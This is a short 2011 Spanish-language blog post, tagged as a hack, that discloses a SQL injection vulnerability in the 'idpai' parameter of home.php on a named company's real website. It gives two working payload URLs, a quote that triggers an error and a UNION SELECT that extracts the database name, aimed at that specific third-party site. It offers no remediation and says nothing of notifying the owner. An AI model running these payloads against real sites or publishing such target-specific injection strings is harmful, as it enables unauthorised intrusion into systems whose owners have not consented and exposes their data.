miércoles, 24 de agosto de 2011

[hack] - iSQL sitio de Grupo Laeisz

Vulnerabilidad de inyección de SQL

Archivo Vulnerable                   Campo vulnerable
home.php                                    idpai

 
Detalles:  Con solo inyectar ' en la url mencionada y se obtiene el error.
 
Ejemplo: 
http://www.grupolaeisz.com/home.php?idpai=2%27 

http://www.grupolaeisz.com/home.php?idpai=2%20union%20select%201,2,database%28%29,4--

Sin más detalles para evitar el abuso de Script kiddies.

0 comentarios :

Publicar un comentario

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host